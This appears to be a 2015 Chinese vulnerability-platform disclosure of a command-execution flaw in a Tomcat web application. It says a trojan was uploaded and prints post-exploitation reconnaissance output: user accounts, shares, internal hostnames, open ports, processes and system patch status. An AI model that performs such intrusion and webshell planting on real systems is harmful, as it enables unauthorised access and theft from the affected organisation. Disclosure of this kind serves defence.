2015-11-06: 细节已通知厂商并且等待厂商处理中 2015-11-10: 厂商已经确认,细节仅向厂商公开 2015-11-20: 细节向核心白帽子及相关领域专家公开 2015-11-30: 细节向普通白帽子公开 2015-12-10: 细节向实习白帽子公开 2015-12-25: 细节向公众公开
打开官网地址**.**.**.**后,点击图中标识链接地址
地址**.**.**.**:8080/jlbzy-ziwo/index.action存在命令执行漏洞
直接上传木马到服务器
[*] 磁盘列表 [ C:D:E:F:Z: ]D:\Tomcat 5.5\webapps\jlbzy-ziwo\jlbzy-ziwo\> net user\\IBM3850 的用户帐户-------------------------------------------------------------------------------Administrator Guest SUPPORT_388945a0 命令成功完成。系统找不到指定的路径。D:\Tomcat 5.5\bin\> net share共享名 资源 注释-------------------------------------------------------------------------------IPC$ 远程 IPC ADMIN$ C:\WINDOWS 远程管理 D$ D:\ 默认共享 E$ E:\ 默认共享 C$ C:\ 默认共享 命令成功完成。D:\Tomcat 5.5\bin\> net view服务器名称 注释-------------------------------------------------------------------------------\\DMSJ \\IBM-SRV-STDDB \\IBM1 \\IBM3650 \\IBM3850 \\JLBZY-597810E37 \\JLBZY-DMNJ \\JLBZY-WEBSERVER 质量诚信系统服务器 \\JLQIZLSERVER ZLCXTX and CQOMIS Server \\LENOVO-PWTXEKPP \\LENOVO-WYUMOVKB \\OFFICE-PC \\SDFG \\STDLIB-613WOOK7 \\WIN-0L97F8FAPJH \\WIN-IEMU7J0CT26 \\WINDOWS-3OB0FET \\WINDOWS-CQ2H49A \\WINDOWS-KD56QCE 命令成功完成。D:\Tomcat 5.5\bin\> netstat -anoActive Connections Proto Local Address Foreign Address State PID TCP **.**.**.**:135 **.**.**.**:0 LISTENING 1436 TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1025 **.**.**.**:0 LISTENING 1192 TCP **.**.**.**:3389 **.**.**.**:0 LISTENING 1756 TCP **.**.**.**:5021 **.**.**.**:0 LISTENING 1552 TCP **.**.**.**:8009 **.**.**.**:0 LISTENING 2808 TCP **.**.**.**:8080 **.**.**.**:0 LISTENING 2808 TCP **.**.**.**:5152 **.**.**.**:0 LISTENING 1944 TCP **.**.**.**:8005 **.**.**.**:0 LISTENING 2808 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:3255 **.**.**.**:139 ESTABLISHED 4 TCP **.**.**.**:4276 **.**.**.**:139 TIME_WAIT 0 TCP **.**.**.**:4624 **.**.**.**:445 ESTABLISHED 4 TCP **.**.**.**:8080 **.**.**.**:34376 ESTABLISHED 2808 UDP **.**.**.**:445 *:* 4 UDP **.**.**.**:500 *:* 1192 UDP **.**.**.**:4500 *:* 1192 UDP **.**.**.**:123 *:* 1516 UDP **.**.**.**:1026 *:* 1516 UDP **.**.**.**:3339 *:* 3488 UDP **.**.**.**:4340 *:* 3496 UDP **.**.**.**:123 *:* 1516 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP **.**.**.**:123 *:* 1516 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4D:\Tomcat 5.5\bin\> tasklist /svc映像名称 PID 服务 ========================= ======== ============================================System Idle Process 0 暂缺 System 4 暂缺 smss.exe 1060 暂缺 csrss.exe 1108 暂缺 winlogon.exe 1132 暂缺 services.exe 1180 Eventlog, PlugPlay lsass.exe 1192 NtLmSsp, PolicyAgent, ProtectedStorage, SamSs svchost.exe 1368 DcomLaunch svchost.exe 1436 RpcSs svchost.exe 1500 Dhcp, Dnscache svchost.exe 1516 LmHosts, W32Time svchost.exe 1552 AeLookupSvc, Browser, CryptSvc, dmserver, EventSystem, helpsvc, HidServ, lanmanserver, lanmanworkstation, Netman, Nla, Schedule, seclogon, SENS, ShellHWDetection, TrkWks, winmgmt, WZCSVC spoolsv.exe 1768 Spooler msdtc.exe 1792 MSDTC svchost.exe 1912 ERSvc jqs.exe 1944 JavaQuickStarterService sqlservr.exe 2004 MSSQLSERVER svchost.exe 228 RemoteRegistry mssearch.exe 312 MSSEARCH explorer.exe 928 暂缺 jusched.exe 1632 暂缺 ctfmon.exe 1324 暂缺 sqlmangr.exe 1392 暂缺 svchost.exe 1756 TermService wmiprvse.exe 2304 暂缺 csrss.exe 2544 暂缺 winlogon.exe 2572 暂缺 rdpclip.exe 2796 暂缺 explorer.exe 2876 暂缺 jusched.exe 3016 暂缺 ctfmon.exe 3032 暂缺 sqlmangr.exe 3044 暂缺 conime.exe 2100 暂缺 conime.exe 1736 暂缺 logon.scr 2436 暂缺 IEXPLORE.EXE 3488 暂缺 csrss.exe 3448 暂缺 winlogon.exe 3780 暂缺 rdpclip.exe 2404 暂缺 explorer.exe 2248 暂缺 jusched.exe 2396 暂缺 ctfmon.exe 2088 暂缺 sqlmangr.exe 3828 暂缺 conime.exe 1956 暂缺 java.exe 2808 暂缺 IEXPLORE.EXE 3496 暂缺 notepad.exe 3924 暂缺 cmd.exe 1476 暂缺 tasklist.exe 956 暂缺 wmiprvse.exe 2992 暂缺 D:\Tomcat 5.5\bin\> ipconfig /allWindows IP Configuration Host Name . . . . . . . . . . . . : ibm3850 Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : NoEthernet adapter 本地连接 3: Media State . . . . . . . . . . . : Media disconnected Description . . . . . . . . . . . : Emulex OneConnect OCe10100, NIC/TOE #2 Physical Address. . . . . . . . . : 00-00-C9-C7-4F-5CEthernet adapter 本地连接 4: Media State . . . . . . . . . . . : Media disconnected Description . . . . . . . . . . . : Emulex OneConnect OCe10100, NIC/TOE Physical Address. . . . . . . . . : 00-00-C9-C7-4F-60Ethernet adapter 本地连接 2: Media State . . . . . . . . . . . : Media disconnected Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #2 Physical Address. . . . . . . . . : 5C-F3-FC-DA-A8-DAEthernet adapter 本地连接: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) Physical Address. . . . . . . . . : 5C-F3-FC-DA-A8-D8 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : **.**.**.** Subnet Mask . . . . . . . . . . . : **.**.**.** Default Gateway . . . . . . . . . : **.**.**.** Primary WINS Server . . . . . . . : **.**.**.**Ethernet adapter 本地连接 5: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : IBM USB Remote NDIS Network Device Physical Address. . . . . . . . . : 5E-F3-FD-35-A8-8B DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IP Address. . . . . . . . . . . . : **.**.**.** Subnet Mask . . . . . . . . . . . : **.**.**.** Default Gateway . . . . . . . . . : DHCP Server . . . . . . . . . . . : **.**.**.** Lease Obtained. . . . . . . . . . : 2015年11月6日 13:30:00 Lease Expires . . . . . . . . . . : 2015年11月6日 13:40:00D:\Tomcat 5.5\bin\> netstat -anoActive Connections Proto Local Address Foreign Address State PID TCP **.**.**.**:135 **.**.**.**:0 LISTENING 1436 TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1025 **.**.**.**:0 LISTENING 1192 TCP **.**.**.**:3389 **.**.**.**:0 LISTENING 1756 TCP **.**.**.**:5021 **.**.**.**:0 LISTENING 1552 TCP **.**.**.**:8009 **.**.**.**:0 LISTENING 2808 TCP **.**.**.**:8080 **.**.**.**:0 LISTENING 2808 TCP **.**.**.**:5152 **.**.**.**:0 LISTENING 1944 TCP **.**.**.**:8005 **.**.**.**:0 LISTENING 2808 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:3255 **.**.**.**:139 ESTABLISHED 4 TCP **.**.**.**:4276 **.**.**.**:139 TIME_WAIT 0 TCP **.**.**.**:4277 **.**.**.**24:139 TIME_WAIT 0 TCP **.**.**.**:4278 **.**.**.**24:139 TIME_WAIT 0 TCP **.**.**.**:4624 **.**.**.**:445 ESTABLISHED 4 TCP **.**.**.**:8080 **.**.**.**:34384 ESTABLISHED 2808 UDP **.**.**.**:445 *:* 4 UDP **.**.**.**:500 *:* 1192 UDP **.**.**.**:4500 *:* 1192 UDP **.**.**.**:123 *:* 1516 UDP **.**.**.**:1026 *:* 1516 UDP **.**.**.**:3339 *:* 3488 UDP **.**.**.**:4340 *:* 3496 UDP **.**.**.**:123 *:* 1516 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP **.**.**.**:123 *:* 1516 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4D:\Tomcat 5.5\bin\> systeminfo主机名: IBM3850OS 名称: Microsoft(R) Windows(R) Server 2003, Enterprise EditionOS 版本: 5.2.3790 Service Pack 2 Build 3790OS 制造商: Microsoft CorporationOS 配置: 独立服务器OS 构件类型: Multiprocessor Free注册的所有人: IBM注册的组织: 产品 ID: 69813-640-0394874-45559初始安装日期: 2012-1-11, 15:03:01系统启动时间: 210 天 4 小时 18 分 22 秒系统制造商: IBM系统型号: System x3850 X5 -[7143OSQ]-系统类型: X86-based PC处理器: 安装了 24 个处理器。 [01]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [02]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [03]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [04]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [05]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [06]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [07]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [08]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [09]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [10]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [11]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [12]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [13]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [14]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [15]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [16]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [17]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [18]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [19]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [20]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [21]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [22]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [23]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 Mhz [24]: x86 Family 6 Model 47 Stepping 2 GenuineIntel ~1862 MhzBIOS 版本: IBM - 0Windows 目录: C:\WINDOWS系统目录: C:\WINDOWS\system32启动设备: \Device\HarddiskVolume1系统区域设置: zh-cn;中文(中国)输入法区域设置: zh-cn;中文(中国)时区: (GMT+08:00) 北京,重庆,香港特别行政区,乌鲁木齐物理内存总量: 16,362 MB可用的物理内存: 15,713 MB页面文件: 最大值: 18,147 MB页面文件: 可用: 17,706 MB页面文件: 使用中: 441 MB页面文件位置: C:\pagefile.sys域: WORKGROUP登录服务器: \\IBM3850修补程序: 安装了 1 个修补程序。 [01]: Q147222网卡: 安装了 5 个 NIC。 [01]: Emulex OneConnect OCe10100, NIC/TOE 连接名: 本地连接 4 状态: 媒体连接已中断 [02]: Emulex OneConnect OCe10100, NIC/TOE 连接名: 本地连接 3 状态: 媒体连接已中断 [03]: IBM USB Remote NDIS Network Device 连接名: 本地连接 5 启用 DHCP: 是 DHCP 服务器: **.**.**.** IP 地址 [01]: **.**.**.** [04]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) 连接名: 本地连接 启用 DHCP: 否 IP 地址 [01]: **.**.**.** [05]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) 连接名: 本地连接 2 状态: 媒体连接已中断D:\Tomcat 5.5\bin\> net start已经启动以下 Windows 服务: Application Experience Lookup Service COM+ Event System Computer Browser Cryptographic Services DCOM Server Process Launcher DHCP Client Distributed Link Tracking Client Distributed Transaction Coordinator DNS Client Error Reporting Service Event Log Help and Support HID Input Service IPSEC Services Java Quick Starter Logical Disk Manager Microsoft Search MSSQLSERVER Network Connections Network Location Awareness (NLA) NT LM Security Support Provider Plug and Play Print Spooler Protected Storage Remote Procedure Call (RPC) Remote Registry Secondary Logon Security Accounts Manager Server Shell Hardware Detection System Event Notification Task Scheduler TCP/IP NetBIOS Helper Terminal Services Windows Management Instrumentation Windows Time Wireless Configuration Workstation命令成功完成。D:\Tomcat 5.5\bin\>
加强安全意识
危害等级:高
漏洞Rank:11
确认时间:2015-11-10 10:30
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无
